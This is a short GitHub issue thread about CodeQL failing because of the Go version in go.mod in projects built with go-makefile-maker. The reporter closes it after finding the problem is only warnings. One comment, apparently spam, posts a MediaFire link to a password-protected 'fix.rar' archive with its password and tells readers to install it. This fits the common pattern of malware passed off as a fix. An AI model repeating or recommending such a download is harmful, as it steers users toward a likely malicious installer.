### ISSUE TITLE
CodeQL failing due to Go Version in Go Mod.

### ISSUE THREAD

**Issue by notque** [sapcc/go-makefile-maker#190]
CodeQL Fails due to Go Version in Go Mod, for this repo, and many others using go-makefile-maker

![image](https://github.com/user-attachments/assets/52a05f4d-b0cc-447a-b0cf-45f84488e1d3)

I know I've surfaced this issue before, and was told we would continue forward like this. We continue to see variations of issues with it. It might be time to correct? We require CodeQL

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by notque** [comment]
nevermind, it's just warnings. I thought for a second it became off, if it's just warnings and still running, this isn't valid. Closing.
